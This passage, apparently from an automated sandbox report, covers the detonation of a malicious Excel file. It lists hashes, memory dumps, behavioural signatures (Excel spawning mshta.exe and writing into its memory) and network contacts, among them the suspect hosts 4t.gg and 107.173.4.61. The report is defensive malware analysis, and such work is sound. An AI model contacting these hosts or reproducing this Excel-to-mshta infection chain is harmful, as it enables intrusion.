| MD5 | 3bcbd3b08e4a8843fda34512623960a2 |
| SHA1 | 244d3df69bbc09a43d4af3de5165f50506b8d7af |
| SHA256 | 7db638aa6b205aadba193dc7803a7e73eb07bbeeacbacad3a65978093e78673c |
| SHA512 | 914f366aab61ed2c13a87ee07e6a4b7aeffe4689c28014fab786244127852a19b7c1ae58bd8dd11840415035290373922f39b628c2409f68569cbf0b8a57e639 |
\Users\Admin\AppData\Local\Temp\sqlite3.dll
| MD5 | dda1b03a5cd2ca37c96b7daf5e3a8ed7 |
| SHA1 | c70e5f58e61980d39608f0795879bf012dbbbca2 |
| SHA256 | 79f86c1edbbc69652a03a0f5667b3985bcf1e19f16fa3b8c7934e5b97ab8586d |
| SHA512 | bf83648c9b5d6d65b2c8409d262a1b7421d2cb13d6c759ec5f352c2d1c5adff3ee2395250fbdfe3590f25fe96bf6b40c2d82a8e7eecaab03be2e6a398e83981f |
memory/2360-119-0x0000000000080000-0x00000000000C4000-memory.dmp
memory/2360-120-0x0000000061E00000-0x0000000061ED2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 02:46
Reported
2024-11-13 02:48
Platform
win10v2004-20241007-en
Max time kernel
144s
Max time network
137s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3092 wrote to memory of 856 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
| PID 3092 wrote to memory of 856 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls"
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 133.204.146.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
| US | 8.8.8.8:53 | 61.4.173.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/3092-1-0x00007FFDDADED000-0x00007FFDDADEE000-memory.dmp
memory/3092-3-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp
memory/3092-2-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp
memory/3092-0-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp
memory/3092-4-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp
memory/3092-5-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-7-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-6-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-8-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp
memory/3092-9-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-10-0x00007FFD98C50000-0x00007FFD98C60000-memory.dmp
memory/3092-11-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-12-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-13-0x00007FFD98C50000-0x00007FFD98C60000-memory.dmp
memory/3092-18-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-17-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-16-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-14-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-15-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-38-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-39-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-41-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-43-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-45-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-47-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-46-0x00007FFDDADED000-0x00007FFDDADEE000-memory.dmp
memory/3092-48-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-52-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-53-0x00007FF69FFD0000-0x00007FF69FFD8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 33ed741e738ffd17972791590e87aa49 |
| SHA1 | e9b716cc084e27b359ecf84a8e747c1e6d2d99a6 |
| SHA256 | 6a4cc7e2807e9a9891c9bda562deef9f9cdca2b8a043c0b9307013e729601156 |
| SHA512 | 84c0e5fac4ab95a78aa2d929c6be519f8f683b64cd13920d59a31ffff09350f0fbf25cd54544e87bb112b503f3bc7222379ccd4748096eaf8fc8aa91df779126 |